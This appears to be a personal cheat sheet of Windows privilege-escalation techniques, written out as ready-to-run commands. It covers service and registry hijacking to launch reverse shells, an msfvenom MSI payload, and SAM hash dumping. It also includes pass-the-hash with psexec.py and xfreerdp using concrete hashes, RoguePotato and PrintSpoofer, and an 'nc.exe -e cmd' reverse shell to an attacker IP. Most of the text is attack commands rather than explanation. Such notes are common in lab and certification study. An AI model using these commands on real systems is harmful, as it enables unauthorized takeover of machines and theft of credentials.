# Windows

**- Registry**\
HKLM is for all users, HKCU is for the current user.\
\
\&#xNAN;**- Check security groups of current user**

```
whoami /Groups
net user <username>
```

**1. Insecure Service Permissions**

```
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user <service=daclsvc>
sc qc <service=daclsvc>
# Elevated Privileges as ‘SERVICE_START_NAME : LocalSystem’
sc config <service=daclsvc> binpath="<path-to-reverse-shell>"
sc start <service=daclsvc>
```

\
**2. Unquoted Service Path**

```
sc qc unquotedsvc
accesschk.exe -d “C:\Program Files\Unquoted Path Service\”
copy reverse.exe “C:\Program Files\Unquoted Path Service\Common”
sc start unquotedsvc
```

\
**3. Weak Registry Permissions**\
\
NT AUTHORITY\INTERACTIVE = All logged-in users\
\
REG\_EXPAND\_SZ : An expandable data string.\
\
REG\_SZ : This data type has a fixed length.

```
sc qc regsvc
accesschk.exe -k <registry-entry-for-service>
accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
reg add <registry-entry-for-service> /v ImagePath /t REG_EXPAND_SZ /d <path-to-rshell>
```

\
**4. Insecure Service Executables**

```
sc qc <service>
accesschk.exe <path-to-service.exe>
# output - RW Everyone
# Replace the service executable with reverse shell generated
```

\
**5. Registry Autoruns**\
\[Todo]

**6. Registry AlwaysInstallElevated**\
set the AlwaysInstallElevated value to "1" (0x1) under both of the following registry keys:\
`HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer`\
`HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer`

```
# Check the keys
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

# Payload generation
msfvenom -f msi
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
# [/i - install ]
```

\
**7. Passwords in Registry**

```
reg query HKLM /f password /s
# Adding autologon password
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /d testing123 /t REG_SZ

# DefaultUsername and DefaultPassword in autologin
# HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

# Query registry value [?]
Get-ChildItem -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\'
```

\
**8. Retrieve password from SAM SYSTEM registry hives**\
\- SAM registry is not accessible\
`reg query HKLM\SAM\SAM`\
ERROR: Access is denied.

```
python3 creddump7/pwdump.py SYSTEM SAM
# Crack NTLM hash
```

\
**9. If creds are saved from a previous user \[run exe from a folder which belongs to the admin/higher privilege user]**

```
# list saved creds
cmdkey /list

# run an executable with priv's on another user
runas /savecred /user:<> <path-to-exec>
```

\
**10. Pass the Hash (pth)**

```
# pth using impacket via SMB [pth-winexe works on SMB]
psexec.py admin@10.10.92.1 -hashes aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da

# xfreerdp with pth (pass-the-hash) [NT component only in LM:NT if no password for LM]
xfreerdp +clipboard /u:admin /pth:a9fdfa038c4b75ebc76dc855dd74f0da /cert:ignore /v:10.10.92.1
```

\
**11. Task running every few intervals**\
Append “path-to-exec” at the end of PowerShell script\
\
**12. Insecure GUI Apps**\
file > open > navigation pane > C:\Windows\System32\cmd.exe\
\
**13. Startup Apps \[createshortcut.vbs]**\
Adding shortcut to reverse executable in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"\
\
**14. RoguePotato Attack**

{% embed url="<https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Cocomazzi-The-Rise-of-Potatoes-Privilege-Escalations-in-Windows-Services.pdf>" %}

• You need a compromised account on the victim machine with Impersonate privileges\
s0- whomai /priv \[SeImpersonatePrivilege is Enabled]\
s1- sudo socat TCP-LISTEN:135,reuseaddr,fork TCP:\<IP of target>:9999\
s2- nc -nlvp \<port-used-in-reverse-exec>\
s3 - when running as “nt authority\local service”\
RoguePotato.exe -r \<IP of attacker> -e "\<path-to-exec>" -l 9999\
\
\- run as a local service "nt authority\local service"\
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\cmd.exe"\
-or-\
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"\
\
**15. PrintSpoofer**\
PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i\
\
\&#xNAN;**- Tools**\
winpeasany.exe\
seatbelt.exe all full\
sharp.exe audit\
JAWS \[works in the presence of AV solutions]

\
\&#xNAN;**- Powerup**

```
Import-Module powerup.ps1
Invoke-AllChecks
Get-ServiceUnquoted
```

\
\&#xNAN;**- List of Exploitable Privileges**

{% embed url="<https://github.com/gtworek/Priv2Admin>" %}

**- SeImpersonate**

```
# PrintSpoofer32.exe [requires an executable file. Hence, PowerShell scripts don't work]
.\PrintSpoofer32.exe -c 'nc.exe <IP> <port> -e cmd'
```